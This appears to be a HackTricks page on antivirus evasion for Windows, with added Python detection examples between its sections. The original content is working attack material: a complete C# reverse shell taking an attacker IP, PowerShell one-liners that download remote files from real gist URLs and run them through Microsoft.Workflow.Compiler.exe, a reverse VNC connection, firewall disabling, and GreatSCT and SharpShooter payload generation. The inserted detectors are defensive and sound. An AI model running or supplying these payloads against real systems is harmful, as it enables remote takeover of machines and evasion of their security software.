HackTricks
AV Bypass

Telnet Server

Up to Windows 10, every Windows version shipped with a Telnet server that could be installed (as administrator) with:

    pkgmgr /iu:"TelnetServer" /quiet

Make it start when the system boots and run it now:

    sc config TlntSVR start= auto obj= localsystem

Change the Telnet port (to blend in) and disable the firewall:

    tlntadmn config port=80
    netsh advfirewall set allprofiles state off

UltraVNC

Execute winvnc.exe and configure the server:
    Enable the option Disable TrayIcon
    Set a password in VNC Password
    Set a password in View-Only Password
Then move the binary winvnc.exe and the newly created file UltraVNC.ini onto the victim.

Reverse connection

The attacker runs vncviewer.exe -listen 5900 on their own host so it is ready to catch the reverse VNC connection. Then, on the victim, run: winvnc.exe [-autoreconnect] -connect <attacker_ip>::5900
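Seen from the monitoring side, every step in the Telnet and UltraVNC sections above is a process launch with a distinctive command line, so the cheapest detection is a handful of command-line rules over process-creation telemetry. The following Python is an added example and not part of the original page: the event shape, the rule set and the sample command lines are constructed for the example (loosely modelled on Sysmon Event ID 1 fields), and the last two events show look-alike administrative commands that must not fire.

```python
import re
from dataclasses import dataclass

# One rule per footprint left by the steps above: a name, a regex over the full
# command line, and why it matters. All rules are case-insensitive.
RULES = [
    ("telnet_server_install",
     re.compile(r'\bpkgmgr(\.exe)?\b.*/iu:"?TelnetServer"?', re.I),
     "Telnet Server optional component installed with pkgmgr"),
    ("telnet_service_autostart",
     re.compile(r'\bsc(\.exe)?\b.*\bconfig\b.*\bTlntSVR\b.*start=\s*auto', re.I),
     "TlntSVR service configured to start at boot"),
    ("telnet_port_change",
     re.compile(r'\btlntadmn(\.exe)?\b.*\bconfig\b.*\bport=\s*(?!23\b)\d+', re.I),
     "Telnet listener moved off 23/tcp, typically to blend in with another service"),
    ("firewall_disabled",
     re.compile(r'\bnetsh(\.exe)?\b.*\badvfirewall\b.*\bset\b.*\bstate\s+off\b', re.I),
     "Windows Firewall switched off for one or more profiles"),
    ("vnc_reverse_connect",
     re.compile(r'\bwinvnc(\.exe)?\b.*-connect\s+\S+', re.I),
     "UltraVNC server instructed to connect out to a listening viewer"),
]


@dataclass
class ProcessEvent:
    """Minimal process-creation record (constructed shape for this example)."""
    host: str
    user: str
    image: str
    command_line: str


def evaluate(event):
    """Return the names of every rule whose pattern matches the event's command line."""
    return [name for name, pattern, _ in RULES if pattern.search(event.command_line)]


def triage(events):
    """Group hits per host; several hits on one host in a short window is the real signal."""
    by_host = {}
    for ev in events:
        for name in evaluate(ev):
            by_host.setdefault(ev.host, []).append((name, ev.user, ev.command_line))
    return by_host


# Constructed sample events, not real telemetry. WS01 and WS02 carry the footprint
# described above; WS03 runs harmless queries that must not match.
SAMPLE_EVENTS = [
    ProcessEvent("WS01", "CORP\\alice", "C:\\Windows\\System32\\pkgmgr.exe",
                 'pkgmgr /iu:"TelnetServer" /quiet'),
    ProcessEvent("WS01", "CORP\\alice", "C:\\Windows\\System32\\sc.exe",
                 "sc config TlntSVR start= auto obj= localsystem"),
    ProcessEvent("WS01", "CORP\\alice", "C:\\Windows\\System32\\tlntadmn.exe",
                 "tlntadmn config port=80"),
    ProcessEvent("WS01", "CORP\\alice", "C:\\Windows\\System32\\netsh.exe",
                 "netsh advfirewall set allprofiles state off"),
    ProcessEvent("WS02", "CORP\\bob", "C:\\Users\\Public\\winvnc.exe",
                 "winvnc.exe -autoreconnect -connect 203.0.113.10::5900"),
    ProcessEvent("WS03", "CORP\\carol", "C:\\Windows\\System32\\netsh.exe",
                 "netsh advfirewall show allprofiles"),
    ProcessEvent("WS03", "CORP\\carol", "C:\\Windows\\System32\\sc.exe",
                 "sc query TlntSVR"),
]

if __name__ == "__main__":
    for host, hits in triage(SAMPLE_EVENTS).items():
        print(host)
        for name, user, cmd in hits:
            print(f"  [{name}] {user}: {cmd}")
```

The port rule deliberately ignores port=23 so that a re-applied default does not alert, and the firewall rule requires the literal `set ... state off` rather than any `netsh advfirewall` invocation, which keeps routine `show` commands quiet. In practice the grouping by host matters more than any single rule: one machine producing the install, autostart and firewall-off events within minutes is the pattern worth paging on.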

GreatSCT

    git clone https://github.com/GreatSCT/GreatSCT.git
    cd GreatSCT/setup/
    ./setup.sh
    cd ..
    ./GreatSCT.py

Inside GreatSCT:

    use 1
    list #Listing available payloads
    use 9 #rev_tcp.py
    set lhost 10.10.14.0
    set lport 4444
    generate #payload is the default name
    #This will generate a meterpreter xml and a rc file for msfconsole

Now start the listener with msfconsole -r file.rc and execute the xml payload with:

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe payload.xml

Current versions of Defender terminate the process very quickly.
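The payload.xml that GreatSCT hands to msbuild.exe is an ordinary MSBuild project carrying an inline task: C# embedded in the project file that the signed build tool compiles and runs as soon as it processes the file. That construct can be found statically, independent of whatever AV decides at runtime. The following Python is an added example, not GreatSCT's or the page's code; the two sample projects are constructed, and the inline task body is a placeholder comment rather than real task code.

```python
import xml.etree.ElementTree as ET

# Task factories that compile source embedded in the project file and run it during the build.
INLINE_TASK_FACTORIES = {"CodeTaskFactory", "RoslynCodeTaskFactory"}


def _local(tag):
    """Strip the XML namespace so namespaced and bare MSBuild files are handled alike."""
    return tag.rsplit("}", 1)[-1]


def scan_msbuild_project(xml_text):
    """Return one finding per inline code task declared in an MSBuild project.

    A finding records the task name, the factory, the Language and Type of the
    embedded <Code> element, how much code it carries, and which <Target>s invoke
    the task. A task that is both declared and invoked runs when msbuild.exe
    processes the file; a declared-but-unused task is worth a look but not an alert.
    """
    root = ET.fromstring(xml_text)
    if _local(root.tag) != "Project":
        return []

    # task name -> names of the targets whose steps call it
    invoked_from = {}
    for node in root.iter():
        if _local(node.tag) == "Target":
            target_name = node.get("Name", "<unnamed>")
            for step in node:
                invoked_from.setdefault(_local(step.tag), []).append(target_name)

    findings = []
    for node in root.iter():
        if _local(node.tag) != "UsingTask":
            continue
        factory = node.get("TaskFactory", "")
        if factory not in INLINE_TASK_FACTORIES:
            continue
        task_name = node.get("TaskName", "<unnamed>")
        code = next((c for c in node.iter() if _local(c.tag) == "Code"), None)
        findings.append({
            "task": task_name,
            "factory": factory,
            # MSBuild defaults: Language="cs", Type="Fragment"
            "language": code.get("Language", "cs") if code is not None else None,
            "code_type": code.get("Type", "Fragment") if code is not None else None,
            "code_chars": len((code.text or "").strip()) if code is not None else 0,
            "invoked_from": invoked_from.get(task_name, []),
        })
    return findings


def executes_on_build(findings):
    """True when at least one inline task is wired into a Target, i.e. the code will run."""
    return any(f["invoked_from"] for f in findings)


# Constructed sample: a normal project that only compiles a source file.
BENIGN_PROJECT = """<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <ItemGroup>
    <Compile Include="Program.cs" />
  </ItemGroup>
  <Target Name="Build">
    <Csc Sources="@(Compile)" OutputAssembly="Program.exe" />
  </Target>
</Project>"""

# Constructed sample of the inline-task shape; the <Code> body is a placeholder comment.
INLINE_TASK_PROJECT = """<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  <Target Name="Build">
    <Loader />
  </Target>
  <UsingTask TaskName="Loader" TaskFactory="CodeTaskFactory"
             AssemblyFile="C:\\Windows\\Microsoft.Net\\Framework\\v4.0.30319\\Microsoft.Build.Tasks.v4.0.dll">
    <Task>
      <Code Type="Class" Language="cs"><![CDATA[
        /* placeholder: inline C# compiled and executed by msbuild.exe at build time */
      ]]></Code>
    </Task>
  </UsingTask>
</Project>"""

if __name__ == "__main__":
    for label, project in (("benign", BENIGN_PROJECT), ("inline-task", INLINE_TASK_PROJECT)):
        found = scan_msbuild_project(project)
        print(f"{label}: {len(found)} inline task(s), executes on build: {executes_on_build(found)}")
        for f in found:
            print("  ", f)
```

A practical deployment runs this over any .xml, .csproj or .proj file that msbuild.exe is observed opening from a user-writable location, and pairs it with the process telemetry: msbuild.exe launched from a machine with no development tooling, with a project file argument outside a source tree, is already unusual before the file contents are examined.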

Compiling our own reverse shell

https://medium.com/@Bank_Security/undetectable-c-c-reverse-shells-fab4c0ec4f15

First C# reverse shell

Compile it with:

    c:\windows\Microsoft.NET\Framework\v4.0.30319\csc.exe /t:exe /out:back2.exe C:\Users\Public\Documents\Back1.cs.txt

Use it with:

    back.exe <ATTACKER_IP> <PORT>
    using System;
    using System.Text;
    using System.IO;
    using System.Diagnostics;
    using System.ComponentModel;
    using System.Linq;
    using System.Net;
    using System.Net.Sockets;

    namespace ConnectBack
    {
        public class Program
        {
            static StreamWriter streamWriter;

            public static void Main(string[] args)
            {
                // args[0] is the address to connect back to, args[1] the port
                using(TcpClient client = new TcpClient(args[0], System.Convert.ToInt32(args[1])))
                {
                    using(Stream stream = client.GetStream())
                    {
                        using(StreamReader rdr = new StreamReader(stream))
                        {
                            streamWriter = new StreamWriter(stream);

                            StringBuilder strInput = new StringBuilder();

                            // cmd.exe with no window and all three standard streams redirected
                            Process p = new Process();
                            p.StartInfo.FileName = "cmd.exe";
                            p.StartInfo.CreateNoWindow = true;
                            p.StartInfo.UseShellExecute = false;
                            p.StartInfo.RedirectStandardOutput = true;
                            p.StartInfo.RedirectStandardInput = true;
                            p.StartInfo.RedirectStandardError = true;
                            p.OutputDataReceived += new DataReceivedEventHandler(CmdOutputDataHandler);
                            p.Start();
                            p.BeginOutputReadLine();

                            // each line read from the socket is handed to cmd.exe's stdin
                            while(true)
                            {
                                strInput.Append(rdr.ReadLine());
                                //strInput.Append("\n");
                                p.StandardInput.WriteLine(strInput);
                                strInput.Remove(0, strInput.Length);
                            }
                        }
                    }
                }
            }

            // cmd.exe output is written back over the same socket
            private static void CmdOutputDataHandler(object sendingProcess, DataReceivedEventArgs outLine)
            {
                StringBuilder strOutput = new StringBuilder();

                if (!String.IsNullOrEmpty(outLine.Data))
                {
                    try
                    {
                        strOutput.Append(outLine.Data);
                        streamWriter.WriteLine(strOutput);
                        streamWriter.Flush();
                    }
                    catch (Exception) { }
                }
            }
        }
    }
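Whatever the binary looks like on disk, the behaviour of the program above is fixed: one process opens an outbound TCP connection to an address outside the network and then becomes the parent of a cmd.exe whose standard streams it owns. Correlating those two facts is signature-independent and is how this class of tool is caught once the executable itself evades scanning. The following Python is an added example, not part of the original page: the event dictionaries are a constructed shape modelled loosely on Sysmon process-creation (ID 1) and network-connection (ID 3) records, the notion of "internal" is RFC 1918 plus loopback and link-local, and the allowlist of parents is illustrative.

```python
import ipaddress
from collections import defaultdict

SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

# Parents that routinely both use the network and spawn shells for a user
# (constructed allowlist; tune to the environment).
ALLOWED_PARENTS = {"explorer.exe", "devenv.exe", "code.exe"}

# Address space treated as internal for this example: RFC 1918, loopback, link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_external(ip):
    """True when the destination lies outside the internal ranges above."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def _basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def correlate(events):
    """Flag processes that connected to an external address and also spawned a shell.

    events: dicts of two kinds (constructed shape):
      {"id": 1, "guid", "image", "parent_guid", "parent_image", "cmd"}   process create
      {"id": 3, "guid", "image", "dest_ip", "dest_port", "initiated"}      network connect
    """
    outbound = defaultdict(list)   # process guid -> [(dest_ip, dest_port)]
    spawned = defaultdict(list)    # parent guid -> [child image]
    image_of = {}
    for ev in events:
        if ev["id"] == 3 and ev.get("initiated", True):
            image_of[ev["guid"]] = ev["image"]
            if is_external(ev["dest_ip"]):
                outbound[ev["guid"]].append((ev["dest_ip"], ev["dest_port"]))
        elif ev["id"] == 1:
            image_of[ev["guid"]] = ev["image"]
            image_of.setdefault(ev["parent_guid"], ev["parent_image"])
            if _basename(ev["image"]) in SHELLS:
                spawned[ev["parent_guid"]].append(ev["image"])

    alerts = []
    for guid in set(outbound) & set(spawned):
        parent = image_of.get(guid, "?")
        if _basename(parent) in ALLOWED_PARENTS:
            continue
        alerts.append({"guid": guid, "image": parent,
                       "connections": outbound[guid], "children": spawned[guid]})
    return sorted(alerts, key=lambda a: a["guid"])


# Constructed sample telemetry. P1 behaves like the program above; the rest is noise.
SAMPLE_EVENTS = [
    {"id": 1, "guid": "P1", "image": "C:\\Users\\Public\\back.exe",
     "parent_guid": "P0", "parent_image": "C:\\Windows\\explorer.exe",
     "cmd": "back.exe 203.0.113.10 443"},
    {"id": 3, "guid": "P1", "image": "C:\\Users\\Public\\back.exe",
     "dest_ip": "203.0.113.10", "dest_port": 443, "initiated": True},
    {"id": 1, "guid": "P2", "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_guid": "P1", "parent_image": "C:\\Users\\Public\\back.exe", "cmd": "cmd.exe"},
    # a browser talks to the internet but never spawns a shell
    {"id": 3, "guid": "P3", "image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "dest_ip": "198.51.100.7", "dest_port": 443, "initiated": True},
    # explorer.exe opens an internal share and launches a shell for the user
    {"id": 3, "guid": "P0", "image": "C:\\Windows\\explorer.exe",
     "dest_ip": "10.0.0.5", "dest_port": 445, "initiated": True},
    {"id": 1, "guid": "P4", "image": "C:\\Windows\\System32\\cmd.exe",
     "parent_guid": "P0", "parent_image": "C:\\Windows\\explorer.exe", "cmd": "cmd.exe"},
]

if __name__ == "__main__":
    for alert in correlate(SAMPLE_EVENTS):
        print(alert)
```

The order of the two events does not matter to the logic, which is deliberate: the shell in the code above is spawned after the connection, but other implementations spawn first and connect afterwards. What makes the rule low-noise is the combination of the two conditions with the allowlist; either condition on its own fires constantly on a normal workstation.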

C# using Microsoft.Workflow.Compiler.exe

    C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt.txt REV.shell.txt

Automatic download and execution:

    64bit:
    powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell

    32bit:
    powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
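The one-liners above are a single cmd.exe command line made of three chained steps: two PowerShell download cradles that write files to the current directory, then a signed .NET binary that compiles and runs those same files. Matching on "powershell" or on the compiler name alone is noisy; the stronger signal is the data flow, a download step whose output file is consumed by a later compile-and-execute step in the same chain. The following Python is an added example, not part of the original page: it splits a command line on the chain operators, tracks what each DownloadFile call writes, and reports when a later step feeds those files to one of a constructed list of compile-and-run binaries. The sample command lines use placeholder URLs and are constructed for the example.

```python
import re
import ntpath

# Signed .NET binaries that will compile or run source handed to them on the command line
# (constructed list for this example; extend from the LOLBAS project for production use).
COMPILE_AND_RUN = {"microsoft.workflow.compiler.exe", "msbuild.exe", "csc.exe", "installutil.exe"}

# WebClient.DownloadFile('<url>', '<local path>') with single-quoted arguments
DOWNLOADFILE = re.compile(
    r"DownloadFile\(\s*'(?P<url>[^']+)'\s*,\s*'(?P<dest>[^']+)'\s*\)", re.I)


def split_chain(command_line):
    """Split a cmd.exe command line on &&, ||, & and ; while respecting double quotes."""
    steps, buf, quoted, i = [], [], False, 0
    while i < len(command_line):
        ch = command_line[i]
        if ch == '"':
            quoted = not quoted
        if not quoted and command_line.startswith(("&&", "||"), i):
            steps.append("".join(buf).strip()); buf = []; i += 2; continue
        if not quoted and ch in "&;":
            steps.append("".join(buf).strip()); buf = []; i += 1; continue
        buf.append(ch); i += 1
    steps.append("".join(buf).strip())
    return [s for s in steps if s]


def analyse_chain(command_line):
    """Return a finding when a step runs a compile-and-run binary on files an earlier step downloaded."""
    downloads = {}   # lower-cased local file name -> url it came from
    for idx, step in enumerate(split_chain(command_line)):
        for m in DOWNLOADFILE.finditer(step):
            downloads[ntpath.basename(m.group("dest")).lower()] = m.group("url")
        tokens = step.split()
        if not tokens:
            continue
        exe = ntpath.basename(tokens[0].strip('"')).lower()
        if exe in COMPILE_AND_RUN:
            args = [ntpath.basename(t.strip('"')).lower() for t in tokens[1:]]
            fed = [a for a in args if a in downloads]
            if fed:
                return {"step": idx, "binary": exe, "downloaded_inputs": fed,
                        "sources": [downloads[a] for a in fed]}
    return None


# Constructed sample with the shape of the one-liners above, placeholder URLs.
SAMPLE_CHAIN = (
    r"""powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://example.invalid/REV.txt', '.\REV.txt') }" """
    r"""&& powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://example.invalid/Rev.Shell', '.\Rev.Shell') }" """
    r"""&& C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell"""
)

# Constructed benign chain: a download followed by an installer, not a compiler.
BENIGN_CHAIN = (
    r"""powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://example.invalid/tool.msi', '.\tool.msi') }" """
    r"""&& msiexec /i tool.msi /qn"""
)

# Constructed: the compiler runs, but on a file nothing in the chain downloaded.
LOCAL_BUILD = r"""cd C:\src\app && msbuild.exe app.csproj /t:Build"""

if __name__ == "__main__":
    for label, chain in (("sample", SAMPLE_CHAIN), ("benign", BENIGN_CHAIN), ("local build", LOCAL_BUILD)):
        print(label, "->", analyse_chain(chain))
```

The quote-aware split matters: the `& {` inside each PowerShell argument is a call operator, not a chain separator, and a naive `split("&")` would cut the cradle in half. Because the check keys on file names rather than on specific URLs, it also catches the same chain pointed at a different host, which is the usual variation between copies of this technique.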

C++

    sudo apt-get install mingw-w64

    i686-w64-mingw32-g++ prometheus.cpp -o prometheus.exe -lws2_32 -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

Merlin, Empire, Puppy, SalsaTools
https://astr0baby.wordpress.com/2013/10/17/customizing-custom-meterpreter-loader/
https://github.com/l0ss/Grouper2
Practical use of JavaScript and COM Scriptlets for Penetration Testing
Bypassing Detection for a Reverse Meterpreter Shell - Checkmate

Other tools

    # Veil Framework:
    https://github.com/Veil-Framework/Veil

    # Shellter
    https://www.shellterproject.com/download/

    # Sharpshooter
    # https://github.com/mdsecactivebreach/SharpShooter
    # Javascript Payload Stageless:
    SharpShooter.py --stageless --dotnetver 4 --payload js --output foo --rawscfile ./raw.txt --sandbox 1=contoso,2,3

    # Stageless HTA Payload:
    SharpShooter.py --stageless --dotnetver 2 --payload hta --output foo --rawscfile ./raw.txt --sandbox 4 --smuggle --template mcafee

    # Staged VBS:
    SharpShooter.py --payload vbs --delivery both --output foo --web http://www.foo.bar/shellcode.payload --dns bar.foo --shellcode --scfile ./csharpsc.txt --sandbox 1=contoso --smuggle --template mcafee --dotnetver 4

    # Donut:
    https://github.com/TheWover/donut

    # Vulcan
    https://github.com/praetorian-code/vulcan

More

GitHub - EgeBalci/sgn: Shikata ga nai (仕方がない) encoder ported into go with several improvements
GitHub - persianhydra/Xeexe-TopAntivirusEvasion: Undetectable & Xor encrypting with custom KEY (FUD Metasploit Rat) bypass Top Antivirus like BitDefender,Malwarebytes,Avast,ESET-NOD32,AVG,... & Automatically Add ICON and MANIFEST to excitable